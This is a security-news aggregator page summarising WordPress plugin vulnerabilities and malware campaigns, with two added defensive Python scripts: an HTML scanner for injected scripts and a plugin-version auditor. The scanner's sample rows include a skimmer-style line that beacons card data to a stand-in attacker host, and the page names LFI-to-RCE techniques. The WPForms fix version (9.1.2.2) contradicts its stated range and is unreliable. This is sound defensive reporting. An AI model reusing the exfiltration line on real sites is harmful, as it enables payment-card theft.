@Talkback Resources
//
Millions of WordPress websites face potential script injection attacks due to a critical vulnerability found in the Essential Addons for Elementor plugin, which is installed on over 2 million sites. The flaw, identified as CVE-2025-24752 with a high severity score of 7.1, allows attackers to execute reflected cross-site scripting (XSS) attacks. This is achieved by exploiting insufficient input sanitization within the plugin's password reset functionality, specifically through malicious URL parameters.
A fake WordPress plugin has also been discovered injecting casino spam, impacting website SEO. In a separate incident, cybersecurity researchers have flagged a malicious Python library on the PyPI repository, named 'automslc', which facilitates over 100,000 unauthorized music downloads from Deezer. The package bypasses Deezer's API restrictions by embedding hardcoded credentials and communicating with an external command-and-control server, effectively turning user systems into a botnet for music piracy. Recommended read:
References :
Pierluigi Paganini@Security Affairs
//
The GitVenom campaign, a sophisticated cyber threat, has been uncovered, exploiting GitHub repositories to spread malicious code and steal cryptocurrency. This campaign involves creating hundreds of repositories that appear legitimate but contain malicious code designed to infect users’ systems. The attackers craft these fake projects in multiple programming languages, including Python, JavaScript, C, C++, and C#, to lure unsuspecting developers. These projects often promise functionalities like automation tools but instead deploy malicious payloads that download additional components from attacker-controlled repositories.
The malicious components include a Node.js stealer that collects sensitive information like credentials and cryptocurrency wallet data, uploading it to the attackers. According to the Securelist report, a clipboard hijacker is also used to replace cryptocurrency wallet addresses, leading to significant financial theft. Kaspersky Labs discovered the GitVenom cybercrime campaign targeting GitHub users to steal cryptocurrency and credentials, with one attacker-controlled Bitcoin wallet receiving about 5 BTC (approximately $485,000) in November 2024. Recommended read:
References :
Pierluigi Paganini@securityaffairs.com
//
A sophisticated credit card skimmer malware campaign is targeting WordPress e-commerce websites, placing user payment information at risk. The malware operates by injecting malicious JavaScript code directly into the database tables of the content management system. This stealthy method allows the skimmer to evade traditional security detection systems, making it difficult to spot and remove. Once activated on the checkout page, the malware either hijacks existing payment fields or injects a fake payment form, closely mimicking legitimate payment processors. This form is designed to capture and record sensitive information such as credit card numbers, expiration dates, CVV numbers, and billing addresses.
The stolen data is then encoded using Base64 and encrypted with AES-CBC to make it appear harmless and harder to analyze. This encrypted data is subsequently sent to an attacker-controlled server using the navigator.sendBeacon function to avoid detection by the website user. The collected data, including payment card details and potentially other personal information, is then used for fraudulent transactions or sold on underground markets. Website owners are advised to examine custom HTML widgets, apply the latest security updates and patches, implement two-factor authentication, regularly review admin accounts, implement file integrity monitoring and use a website firewall for protection. Recommended read:
References :
@ciso2ciso.com
//
Critical security vulnerabilities have been discovered in the Fancy Product Designer plugin for WordPress, a popular premium plugin with over 20,000 sales that enables extensive product customization on WooCommerce sites. Patchstack researchers identified two unpatched critical flaws: an unauthenticated arbitrary file upload vulnerability (CVE-2024-51919) and an unauthenticated SQL injection vulnerability (CVE-2024-51818). These vulnerabilities place websites using the plugin at significant risk of unauthorized access and data breaches, as they allow for remote code execution and direct SQL database manipulation by malicious actors.
The file upload flaw is caused by inadequate input validation in the `save_remote_file` and `fpd_admin_copy_file` functions, which allows for uploading of PHP files and thus remote code execution. The SQL injection flaw originates from the `get_products_sql_attrs` function, which fails to properly sanitize inputs, rendering the `strip_tags` function ineffective against such attacks. Website administrators using the Fancy Product Designer plugin are advised to immediately deactivate or remove it until a security patch is released by the vendor, Radykal. They should also monitor official channels for updates and implement WAFs to block exploitation attempts. Recommended read:
References :
@www.the420.in
//
A large-scale malware campaign has compromised over 35,000 websites by injecting malicious JavaScript. The injected scripts redirect users to Chinese-language gambling platforms, specifically under the "Kaiyun" brand. This attack utilizes obfuscated JavaScript payloads to hijack user browsers, replacing legitimate website content with full-page redirects.
This malicious campaign operates by embedding a one-line `<script>` tag into the source code of affected websites. These scripts then reference domains like zuizhongjs[.]com and other similar URLs. Once loaded, these scripts dynamically inject further payloads, manipulating browser behavior and creating a full-screen overlay that redirects users to unlicensed gambling platforms in Mandarin, targeting users in regions where Mandarin is predominantly spoken. The attackers employ techniques such as string concatenation and Unicode escapes to conceal their activities and evade detection by automated security systems. Recommended read:
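Both the skimmer item above (JavaScript stored in CMS database tables, exfiltration via `navigator.sendBeacon`) and the Kaiyun redirect item (a one-line external `<script>` tag, string concatenation and Unicode escapes) describe injected markup that a site owner can look for in stored content. The following is an added example, not code from any of the referenced reports, showing one way to scan stored HTML (e.g. `post_content` rows or widget HTML exported from the database) for those indicators. The allowlist of script hosts, the sample rows and the `.test` domains are constructed for the example; the heuristics are deliberately simple and will need tuning for a real site.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (hypothetical allowlist; adjust per site).
ALLOWED_SCRIPT_HOSTS = {"example-shop.test", "cdn.example-shop.test"}

# Heuristic indicators for inline script bodies, drawn from the campaigns summarised above.
INDICATORS = {
    "unicode_escapes": re.compile(r"(?:\\u[0-9a-fA-F]{4}){4,}"),          # runs of \uXXXX escapes
    "string_concat": re.compile(r"""(?:['"][^'"]{1,4}['"]\s*\+\s*){3,}"""),  # 'a'+'b'+'c'+... obfuscation
    "send_beacon": re.compile(r"navigator\.sendBeacon\s*\("),               # quiet exfiltration call
    "base64_blob": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),                 # long encoded payloads
    "dynamic_iframe": re.compile(r"createElement\s*\(\s*['\"]iframe['\"]\s*\)"),
}


class _ScriptCollector(HTMLParser):
    """Collect <script src> values and inline script bodies from a stored HTML fragment."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def scan_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a sorted list of indicator names triggered by one HTML fragment."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = set()
    for src in parser.srcs:
        # urlparse handles absolute and protocol-relative (//host/x) URLs; relative
        # paths have no hostname and are treated as same-origin.
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            findings.add("external_script:" + host)
    for body in parser.inline:
        for name, rx in INDICATORS.items():
            if rx.search(body):
                findings.add(name)
    return sorted(findings)


def scan_rows(rows, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """rows: iterable of (row_id, html). Returns {row_id: findings} for flagged rows only."""
    return {rid: f for rid, html in rows if (f := scan_html(html, allowed_hosts))}


# Constructed sample rows standing in for wp_posts.post_content / widget HTML (not real captures).
SAMPLE_ROWS = [
    (101, "<p>Welcome to our shop.</p><script src=\"/wp-includes/js/jquery.js\"></script>"),
    (102, "<p>Sale!</p><script src=\"//example-malicious-cdn.test/app.js\"></script>"),
    (103, "<script>var a='o'+'n'+'l'+'o'+'a'+'d';document.write('\\u003c\\u0073\\u0063\\u0072');</script>"),
    (104, "<div id='checkout'><script>navigator.sendBeacon('https://collector.example-malicious.test/p', btoa(JSON.stringify(cardData)));</script></div>"),
]

if __name__ == "__main__":
    for rid, findings in scan_rows(SAMPLE_ROWS).items():
        print(rid, findings)
```

In practice the rows would come from `wp_posts`, `wp_postmeta` and the widget entries in `wp_options`; any hit on an unexpected external script host or on the obfuscation indicators is a lead for manual review, not proof of compromise on its own.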
References :
@www.bleepingcomputer.com
//
A critical security flaw has been discovered in the W3 Total Cache plugin, a popular tool used by over one million WordPress websites. This vulnerability, tracked as CVE-2024-12365, allows attackers with even subscriber-level access to gain unauthorized access to sensitive data. The flaw stems from a lack of proper capability checks in the plugin's "is_w3tc_admin_page" function, enabling disclosure of sensitive information such as nonce values. This could lead to information disclosure, excessive service consumption, and unauthorized requests to internal services, including metadata on cloud-based apps.
This vulnerability, which was publicly disclosed on January 13, 2025, poses a significant risk due to the widespread use of the plugin. Attackers can leverage this to access system data and perform unauthorized actions. While a patch has been released in version 2.8.2 of the W3 Total Cache plugin, many sites have yet to apply the update. Website administrators are urged to update to version 2.8.2 or later immediately to mitigate this high-severity risk, as well as review user access levels and conduct security audits. Recommended read:
References :
@gbhackers.com
//
References: gbhackers.com, securityonline.info
A critical vulnerability has been discovered in the popular UpdraftPlus: WP Backup & Migration Plugin, impacting over 3 million WordPress websites. This security flaw, identified as CVE-2024-10957, allows unauthenticated attackers to exploit a PHP Object Injection vulnerability through deserialization of untrusted input. The issue affects all versions of the plugin up to and including 1.24.11, with a patch released in version 1.24.12. The vulnerability has a high-risk CVSS score of 8.8 and could lead to severe consequences such as unauthorized file deletions, retrieval of sensitive user data, and even remote code execution. The exploit is triggered when an administrator performs a search and replace action within the plugin.
Website administrators using the UpdraftPlus plugin are urged to take immediate action and update to version 1.24.12 or later. It is essential for all WordPress users to review their installations, including all active plugins, to ensure they are updated with the latest versions. The ease of updating plugins via the WordPress dashboard reduces the window for potential attacks, and it is critical to stay informed about vulnerabilities like CVE-2024-10957 to prevent severe breaches. While no known proof-of-concept exploit exists for the plugin on its own, additional vulnerabilities in other plugins and themes can raise the overall risk. Recommended read:
References :
@gbhackers.com
//
A massive cyberattack has compromised over 10,000 WordPress websites, using them to distribute malware to both macOS and Windows users. The attackers exploited vulnerabilities in outdated WordPress versions and plugins, injecting malicious JavaScript code into the sites. This code redirects visitors to fake browser update pages, which then trick users into downloading malicious software. The campaign represents a significant escalation in threat sophistication, with the malware being delivered through client-side attacks via iframes. The malicious JavaScript dynamically injects the fake update pages, and also uses DNS prefetching to enhance the speed of loading these malicious domains.
The malware distributed includes AMOS (Atomic macOS Stealer), which targets macOS users by stealing sensitive data such as passwords and cryptocurrency wallet information. Windows users are targeted by SocGholish, a malware strain that acts as a downloader for additional malicious payloads. This coordinated approach on two operating systems suggests a sophisticated attack group or collaboration. Security experts warn that this is one of the first known cases of these specific malware strains being delivered through client-side attacks, and are urging website administrators to immediately update their WordPress installations and plugins, remove unused components, and review server logs for signs of compromise. Recommended read:
References :
@cve.mitre.org
//
References: Pyrzout :vm:, The Cyber Express
A critical vulnerability, identified as CVE-2024-11205, has been discovered in the WPForms plugin for WordPress. This security flaw impacts plugin versions 1.8.4 through 1.9.2.1. The issue arises from a missing authorization check within the wpforms_is_admin_page function, which allows attackers with even Subscriber-level privileges to perform unauthorized actions. Specifically, malicious actors could potentially refund payments and cancel subscriptions. This exploit could result in significant financial losses and disruptions for website owners using the affected WPForms plugin.
The vulnerability highlights the critical need for proactive security measures within WordPress environments. A fix is available in plugin version 9.1.2.2 or later, and administrators are urged to update immediately. Website operators should review user permissions, enable two-factor authentication, and closely monitor site activity for suspicious behavior. Regular backups are also essential to ensure data integrity in the event of a successful attack. CERT-In has issued alerts to WordPress users, emphasizing the urgency of this situation and the need to apply the latest updates. Recommended read:
References :
Rescana@Rescana
//
A critical vulnerability, tracked as CVE-2025-26909, has been identified in the WP Ghost plugin, a popular WordPress security plugin used by over 200,000 websites. This Local File Inclusion (LFI) flaw can escalate to Remote Code Execution (RCE), potentially allowing attackers to gain complete control over affected web servers without authentication. The vulnerability stems from insufficient validation of user-supplied input through the URL path, specifically within the `showFile` function invoked by the `maybeShowNotFound` function.
This flaw allows unauthenticated users to manipulate the URL to trigger file inclusion, potentially leading to arbitrary code execution, especially when the "Change Paths" feature is set to Lite or Ghost mode. Exploit techniques such as `php://filter` chains and leveraging `PHP_SESSION_UPLOAD_PROGRESS` can be used. Website administrators are strongly advised to immediately update their WP Ghost plugin to the latest version 5.4.02 to mitigate this severe security risk and implement additional security measures. In related news, GoDaddy Security researchers have uncovered a long-running malware operation named DollyWay, which targets visitors of infected WordPress sites. This campaign utilizes injected redirect scripts and a distributed network of TDS nodes hosted on compromised websites to redirect users to malicious sites. This highlights the broader issue of WordPress plugin vulnerabilities and the importance of maintaining strong security practices, including regular updates and vigilance. Recommended read:
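Four of the items above reduce, for the site owner, to a version question: W3 Total Cache before 2.8.2 (CVE-2024-12365), UpdraftPlus up to and including 1.24.11 (CVE-2024-10957), WPForms 1.8.4 through 1.9.2.1 (CVE-2024-11205) and WP Ghost before 5.4.02 (CVE-2025-26909). The following is an added example, not code from any of the vendors or reports, that reads the `Version:` field from each plugin's header comment and compares it numerically against those ranges. The plugin directory slugs (`w3-total-cache`, `updraftplus`, `wpforms-lite`, `wp-ghost`) and the sample inventory are assumptions for the example; confirm the slugs against the actual `wp-content/plugins` directory.

```python
import re
from pathlib import Path

# Affected ranges as stated in the items above. "fixed" is exclusive (affected if
# version < fixed); "min"/"max" are inclusive bounds. Slugs are assumed directory names.
RULES = {
    "w3-total-cache": {"cve": "CVE-2024-12365", "fixed": "2.8.2"},
    "updraftplus":    {"cve": "CVE-2024-10957", "fixed": "1.24.12"},
    "wpforms-lite":   {"cve": "CVE-2024-11205", "min": "1.8.4", "max": "1.9.2.1"},
    "wp-ghost":       {"cve": "CVE-2025-26909", "fixed": "5.4.02"},
}

# WordPress plugin header line, e.g. " * Version: 1.24.11" inside the main PHP file's comment.
HEADER_RX = re.compile(r"^\s*\*?\s*Version:\s*([0-9][0-9A-Za-z.\-]*)", re.M)


def version_key(v):
    """Numeric components of a dotted version: '5.4.02' -> (5, 4, 2)."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def version_lt(a, b):
    """Zero-padded numeric comparison so that '2.8' == '2.8.0' and '5.4.02' == '5.4.2'."""
    ka, kb = version_key(a), version_key(b)
    n = max(len(ka), len(kb))
    ka += (0,) * (n - len(ka))
    kb += (0,) * (n - len(kb))
    return ka < kb


def is_affected(version, rule):
    """True if the installed version falls inside the rule's affected range."""
    if "fixed" in rule and not version_lt(version, rule["fixed"]):
        return False
    if "min" in rule and version_lt(version, rule["min"]):
        return False
    if "max" in rule and version_lt(rule["max"], version):
        return False
    return True


def version_from_header(php_source):
    """Extract the Version: field from a WordPress plugin header comment, or None."""
    m = HEADER_RX.search(php_source)
    return m.group(1) if m else None


def audit_versions(installed):
    """installed: {slug: version}. Returns [(slug, version, cve)] for affected plugins."""
    hits = []
    for slug, version in installed.items():
        rule = RULES.get(slug)
        if rule and is_affected(version, rule):
            hits.append((slug, version, rule["cve"]))
    return hits


def audit_plugins_dir(plugins_root):
    """Filesystem variant: read each plugin's header under wp-content/plugins and audit."""
    installed = {}
    for d in Path(plugins_root).iterdir():
        if not d.is_dir():
            continue
        for php in d.glob("*.php"):
            v = version_from_header(php.read_text(errors="ignore"))
            if v:
                installed[d.name] = v
                break
    return audit_versions(installed)


# Constructed sample inventory (not taken from a real site).
SAMPLE_INSTALLED = {
    "w3-total-cache": "2.8.1",
    "updraftplus": "1.24.12",
    "wpforms-lite": "1.9.2.1",
    "wp-ghost": "5.4.1",
    "akismet": "5.3",
}

if __name__ == "__main__":
    for slug, version, cve in audit_versions(SAMPLE_INSTALLED):
        print(f"{slug} {version}: affected by {cve}")
```

Run `audit_plugins_dir("/var/www/html/wp-content/plugins")` against a real install to get the same report from disk; the header parser only reads the first PHP file in each plugin directory that carries a `Version:` line, which is the WordPress convention for the main plugin file.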
References :